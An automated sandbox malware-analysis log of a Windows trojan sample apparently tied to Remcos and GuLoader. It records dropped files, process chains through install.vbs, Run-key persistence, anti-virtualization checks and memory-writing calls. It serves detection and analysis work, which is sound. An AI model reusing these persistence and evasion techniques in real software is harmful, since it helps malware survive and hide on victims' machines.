Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B2F50	18_2_020B2F50
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B136B	18_2_020B136B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B3B6F	18_2_020B3B6F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B6363	18_2_020B6363
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B3B60	18_2_020B3B60
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B1F7F	18_2_020B1F7F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4F8C	18_2_020B4F8C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B2B83	18_2_020B2B83
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B0F9B	18_2_020B0F9B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4797	18_2_020B4797
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B2FA8	18_2_020B2FA8
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B3BAF	18_2_020B3BAF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B63AC	18_2_020B63AC
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4FB8	18_2_020B4FB8
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B8BBE	18_2_020B8BBE
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4BB0	18_2_020B4BB0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B2BD8	18_2_020B2BD8
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B0FEB	18_2_020B0FEB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B47F4	18_2_020B47F4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B3C0C	18_2_020B3C0C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B641B	18_2_020B641B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4C16	18_2_020B4C16
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B0C25	18_2_020B0C25
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B3C3F	18_2_020B3C3F
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B2C33	18_2_020B2C33
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B104C	18_2_020B104C
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4847	18_2_020B4847
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B8C44	18_2_020B8C44
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B0C5B	18_2_020B0C5B
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4C68	18_2_020B4C68
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B8C6D	18_2_020B8C6D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B3063	18_2_020B3063
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B247D	18_2_020B247D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B6480	18_2_020B6480
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B4899	18_2_020B4899
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B2C94	18_2_020B2C94
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B1094	18_2_020B1094
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B0CA6	18_2_020B0CA6
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B10CB	18_2_020B10CB
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B44CF	18_2_020B44CF
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B0CC1	18_2_020B0CC1
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B44C0	18_2_020B44C0
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B30C4	18_2_020B30C4
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 18_2_020B64DB	18_2_020B64DB

Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: win.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000000.00000002.384061860.000000000041B000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameCamases3.exe vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000000.00000002.384937023.00000000029A0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameCamases3.exeFE2Xj vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000000.00000002.384197435.00000000020A0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000004.00000002.466440658.000000001E030000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000004.00000002.462556682.000000000085C000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000004.00000002.462556682.000000000085C000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000004.00000002.466753489.000000001E130000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000004.00000002.466753489.000000001E130000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000004.00000000.383148228.000000000041B000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameCamases3.exe vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000004.00000002.462715117.0000000002400000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Binary or memory string: OriginalFilenameCamases3.exe vs SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe

Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal96.troj.evad.winEXE@19/10@9/3

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe

File created: C:\Users\user\AppData\Roaming\win.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\win.exe	Mutant created: \Sessions\1\BaseNamedObjects\Remcos-E2OTZW
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_01

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe

File created: C:\Users\user\AppData\Local\Temp\~DF1570032FE38D6039.TMP

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe

Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'

Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'
Source: C:\Users\user\AppData\Roaming\win.exe	Process created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'
Source: C:\Users\user\AppData\Roaming\win.exe	Process created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe
Source: C:\Users\user\AppData\Roaming\win.exe	Process created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process created: C:\Windows\System32\backgroundTaskHost.exe 'C:\Windows\system32\backgroundTaskHost.exe' -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.383895844.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.644122683.00000000020B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.660151221.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.603499845.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.596745893.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.613714696.00000000020B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.566291257.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.566645906.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.679457919.0000000000560000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_0040828A push esp; retf	0_2_0040828C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_00405F01 pushfd ; iretd	0_2_00405F02
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_00406914 push eax; retf	0_2_00406915
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_004077CE push ss; ret	0_2_004077CF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020BA211 push es; retf	0_2_020BA220
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B8516 push es; retf	0_2_020BA220
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00566CD5 push es; iretd	22_2_00566D4D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00566DA2 push es; iretd	22_2_00566D4D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 22_2_00565B95 push es; iretd	22_2_00566D4D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00566CD5 push es; iretd	24_2_00566D4D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00566DA2 push es; iretd	24_2_00566D4D
Source: C:\Users\user\AppData\Roaming\win.exe	Code function: 24_2_00565B95 push es; iretd	24_2_00566D4D

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe

File created: C:\Users\user\AppData\Roaming\win.exe

Jump to dropped file

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run win			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run win			Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0CBA D3DKMTSetStablePowerState,NtWriteVirtualMemory,TerminateProcess,	0_2_020B0CBA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B1D2E NtWriteVirtualMemory,LoadLibraryA,	0_2_020B1D2E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4A27 NtWriteVirtualMemory,	0_2_020B4A27
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4638 NtWriteVirtualMemory,	0_2_020B4638
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B3E30 NtWriteVirtualMemory,	0_2_020B3E30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4E36 NtWriteVirtualMemory,	0_2_020B4E36
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0E4D D3DKMTSetStablePowerState,TerminateProcess,	0_2_020B0E4D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B3244	0_2_020B3244
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B7E78 NtWriteVirtualMemory,	0_2_020B7E78
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4A73 NtWriteVirtualMemory,	0_2_020B4A73
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B3275	0_2_020B3275
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0E80 D3DKMTSetStablePowerState,TerminateProcess,	0_2_020B0E80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4A87 NtWriteVirtualMemory,	0_2_020B4A87
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4E99 NtWriteVirtualMemory,	0_2_020B4E99
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4694 NtWriteVirtualMemory,	0_2_020B4694
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4AA0 NtWriteVirtualMemory,	0_2_020B4AA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0EB3 D3DKMTSetStablePowerState,TerminateProcess,	0_2_020B0EB3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B46D3 NtWriteVirtualMemory,	0_2_020B46D3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B1ED7 NtWriteVirtualMemory,	0_2_020B1ED7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B2B01 NtWriteVirtualMemory,	0_2_020B2B01
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4B00 NtWriteVirtualMemory,	0_2_020B4B00
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B0F2F D3DKMTSetStablePowerState,TerminateProcess,	0_2_020B0F2F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4B2D NtWriteVirtualMemory,	0_2_020B4B2D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B4B25 NtWriteVirtualMemory,	0_2_020B4B25
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	Code function: 0_2_020B2F3E NtWriteVirtualMemory,LoadLibraryA,	0_2_020B2F3E
